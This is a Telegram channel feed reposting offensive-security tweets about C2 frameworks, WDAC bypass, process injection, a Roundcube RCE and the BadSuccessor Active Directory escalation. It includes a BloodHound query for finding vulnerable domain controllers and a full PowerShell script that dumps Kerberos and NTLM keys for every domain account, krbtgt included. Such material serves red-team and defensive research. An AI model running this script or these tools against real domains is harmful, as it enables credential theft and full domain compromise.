Offensive Xwitter – Telegram
Offensive Xwitter
19.4K subscribers
908 photos
48 videos
21 files
2.09K links
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://news.1rj.ru/str/OffensiveTwitter/546
😈 [ mert @merterpreter ]

Did you know that if S1 is installed in your environment, you can gain SYSTEM privileges without running a getsystem command from your C2 by editing SentinelOne's Autorepair task? Needs local admin priv.

🐥 [ tweet ]
🥱9👍3
😈 [ chompie @chompie1337 ]

Me and the homies are dropping browser exploits on the red team engagement 😎. Find out how to bypass WDAC + execute native shellcode using this one weird trick -- exploiting the V8 engine of a vulnerable trusted application.

🔗 https://www.ibm.com/think/x-force/operationalizing-browser-exploits-to-bypass-wdac

🐥 [ tweet ]
🔥8
😈 [ blasty @bl4sty ]

ok ok fine, for old time's sake

🔗 https://haxx.in/files/limit-your-screentime.sh

🐥 [ tweet ]
👍9🔥5🥱4
😈 [ Oliver Lyak @ly4k_ ]

The Future of Certipy and the Release of v5 & ESC16 👇

🔗 https://github.com/ly4k/Certipy/discussions/270

🐥 [ tweet ]
🔥8🥱3
😈 [ Bad Sector Labs @badsectorlabs ]

Cobalt Strike for free!? Adaptix C2 (@hacker_ralf) is the best open source C2 I've used since Havoc (@C5pider). SOCKS5, remote and local port forwards, and BOF support! Now it's easy to install the server + client, especially on 🏟️Ludus with our new role:

🔗 https://github.com/badsectorlabs/ludus_adaptix_c2

🐥 [ tweet ]
🔥21🤔1😢1
😈 [ mpgn @mpgn_x64 ]

Thanks to the awesome work of @LadhaAleem , the CTF Windows Active Directory lab for @_barbhack_ from 2024 is now public! 🔥

You can build the lab and pwn the AD — 13 flags to capture! No public write-up exists yet — waiting for someone to submit one!

🔗 https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024

🐥 [ tweet ]
🔥12
😈 [ Matt Ehrnschwender @M_alphaaa ]

I am very excited to be releasing Tetanus, a Mythic C2 agent written in Rust! This is a project @0xdab0 and I have been working on to experiment with the Rust programming language by developing a Mythic C2 agent.

🔗 https://github.com/MythicAgents/tetanus

🐥 [ tweet ]

Eh, if only everything in the world could be rewritten in Rust 🦀 👍🏻 🦀 👍🏻
😁13🍌3👍2
😈 [ Steve S. @0xTriboulet ]

rssh-rs is a reflective DLL that performs some hacky integration with your favorite C2 Framework to provide SSH session access from a Beacon session.

🔗 https://github.com/0xTriboulet/rssh-rs

🐥 [ tweet ]
👍1
😈 [ Yehuda Smirnov @yudasm_ ]

What if you skipped VirtualAlloc, skipped WriteProcessMemory and still got code execution?
We explored process injection using nothing but thread context.
Full write-up + PoCs:

🔗 https://blog.fndsec.net/2025/05/16/the-context-only-attack-surface/

🐥 [ tweet ]
🔥9🥱2👍1
😈 [ Yuval Gordon @YuG0rd ]

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability
It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️
Read Here -

🔗 https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory

🐥 [ tweet ]
🔥9
😈 [ Bad Sector Labs @badsectorlabs ]

// Collect every computer that is a (transitive) member of Domain Controllers (RID 516)
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group)
WHERE g.objectsid ENDS WITH '-516'
WITH COLLECT(c1.name) AS dcs
// Keep only the enabled DCs running Windows Server 2025: BadSuccessor needs at least one such DC
MATCH (c2:Computer)
WHERE c2.enabled = true
  AND c2.operatingsystem CONTAINS '2025'
  AND c2.name IN dcs
RETURN c2.name

If this query hits, you're in.

🐥 [ tweet ][ quote ]
👍5
😈 [ mpgn @mpgn_x64 ]

Based on the research of Akamai, I made a new module on netexec to find every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions 🔥

🔗 https://github.com/Pennyw0rth/NetExec/pull/702

🐥 [ tweet ][ quote ]
🔥11🥱3👍1
😈 [ David Kennedy @Cyb3rC3lt ]

Python version of BadSuccessor by Cybrly.

🔗 https://github.com/cybrly/badsuccessor

🐥 [ tweet ]
🔥6👍3🥱2
😈 [ Yuval Gordon @YuG0rd ]

Many missed this on #BadSuccessor: it's also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal: krbtgt, users, machines. No DCSync required, no code execution on the DC.

🐥 [ tweet ]

What an absolute demolition 😂🤣

upd. for the record, the author does something along these lines, with his own version of Rubeus:

# Assumed prerequisites: the RSAT ActiveDirectory module, the author's modified Rubeus exposed as
# Invoke-Rubeus, a dMSA you control at $dmsa, and $kirbi holding the base64 .kirbi TGT of mydmsa$
# obtained beforehand (the original snippet used $kirbi without defining it).
Import-Module ActiveDirectory
$kirbi = '<base64 TGT of mydmsa$>'   # placeholder: supply the dMSA's TGT here
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
# Every user and computer DN in the domain (krbtgt is a user object), with its sAMAccountName
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
        + @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
    # Point the dMSA's "preceded by" link at the target so the KDC treats the dMSA as its successor
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    # Request a TGS as the dMSA; the reply carries the predecessor's keys, which Rubeus prints
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    # Trailing '$' made optional so user accounts (no '$' suffix) match as well as machine accounts
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$?: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
😁13🔥9🥱2
😈 [ Matt Ehrnschwender @M_alphaaa ]

I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.

🔗 https://github.com/MEhrn00/boflink

Supporting blog post about it.

🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/

🐥 [ tweet ]
🍌7😁1
Forwarded from PT SWARM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.

This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.

If you're running Roundcube — update immediately!
🔥25🥱1🍌1
😈 [ Aditya Telange @adityatelange ]

evil-winrm-py v1 released🌟

🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0

🐥 [ tweet ]
👍6🔥6
😈 [ Fabian @testert01 ]

Unconstrained Delegation on a gMSA, plus WebClient / NTLMv1 active on servers that can retrieve the credentials of that gMSA, can lead to a complete domain compromise from domain users.

@micahvandeusen, @_dirkjan, nice tools :)

🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/

🐥 [ tweet ]
👍6
😈 [ mr.d0x @mrd0x ]

Finally had some time to publish these blogs. Enjoy!

Spying On Screen Activity Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/

Camera and Microphone Spying Using Chromium Browsers

🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/

🐥 [ tweet ]
👍7🥱4